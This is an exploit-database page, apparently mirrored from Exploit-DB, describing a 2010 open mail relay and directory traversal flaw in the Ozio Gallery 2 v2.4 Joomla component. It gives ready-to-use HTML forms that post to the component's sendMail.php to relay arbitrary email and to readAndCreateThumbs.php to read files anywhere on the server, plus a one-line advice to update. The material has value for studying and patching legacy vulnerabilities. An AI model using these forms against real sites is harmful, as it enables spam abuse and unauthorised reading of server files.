header-logo
Suggest Exploit
vendor:
Ozio Gallery 2
by:
jdc
7,5
CVSS
HIGH
Open Mail Relay and Directory Traversal
502, 22
CWE
Product Name: Ozio Gallery 2
Affected Version From: 2.4
Affected Version To: 2.4
Patch Exists: YES
Related CWE: N/A
CPE: a:joomla:joomla
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP5, MySQL5
2010

Joomla Component Ozio Gallery 2 Multiple Vulnerabilities

The Ozio Gallery 2 component for Joomla is vulnerable to an open mail relay and a directory traversal vulnerability. An attacker can exploit the open mail relay vulnerability by sending an email to any address from the vulnerable server. The directory traversal vulnerability allows an attacker to read and create thumbnails of any file on the server.

Mitigation:

Update to the latest version of Ozio Gallery 2 component for Joomla.
Source

Exploit-DB raw data:

<!--
# Exploit Title: Joomla Component Ozio Gallery 2 Multiple Vulnerabilities
# Date: 28 May 2010
# Author: jdc
# Software Link: 
http://extensions.joomla.org/extensions/photos-a-images/photo-flash-gallery/4883
# Version: 2.4
# Tested on: PHP5, MySQL5
-->

<h2>Ozio Gallery 2</h2>
<h3>v 2.4</h3>

<h4>Open Mail Relay:</h4>

<form method="post" 
action="http://[target]/components/com_oziogallery2/imagin/scripts_ralcr/others/sendMail.php">
<label for="to">To:</label><input id="to" name="to" type="text" /><br />
<label for="from">From:</label><input id="from" name="from" type="text" 
/><br />
<label for="subject">Subject:</label><input id="subject" name="subject" 
type="text" /><br />
<label for="message">Message:</label><textarea id="message" 
name="message"></textarea><br />
<input type="submit" value="Send"/>
</form>


<h4>Directory Traversal:</h4>

<form method="post" 
action="http://[target]/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/readAndCreateThumbs.php">
<label for="path">path:</label><input id="path" name="path" type="text" 
/><br />
<input type="submit" value="Send"/>
</form>

Navigation

Suggest Exploit

Services By CQR